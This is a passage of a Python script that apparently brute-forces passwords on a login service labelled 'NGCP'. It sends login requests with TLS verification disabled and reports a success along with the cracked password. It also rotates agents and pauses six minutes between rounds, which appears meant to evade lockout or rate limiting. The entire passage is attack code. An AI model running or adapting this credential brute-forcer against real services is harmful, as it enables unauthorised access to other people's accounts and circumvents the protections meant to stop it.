			'os': "Linux x86_64"
		}
		json_params = json.dumps(params).encode('utf-8')

		try:
			# ``verify=False`` disables TLS certificate validation on both requests.
			response = requests.post(
				url1, data='Request=API%13CAC%5FLOGIN%13%14',
				headers=headers, verify=False)

			if response.status_code == 200:
				headers['Accept'] = 'application/json'
				response2 = requests.post(
					url2, data=json_params, headers=headers, verify=False)
				if response2.status_code == 201:
					globals.messages(7)
					mess = ['NGCP', password]
					globals.messages(9, mess)
					bruteforcesuccesfull = 1
					break
				else:
					# Advance through the four agents, then pause six
					# minutes before starting over.
					if a <= 2:
						a += 1
					else:
						time.sleep(360)
						a = 0

		except Exception as e:
			logging.error(e, exc_info=True)

	if not bruteforcesuccesfull:
		globals.messages(8)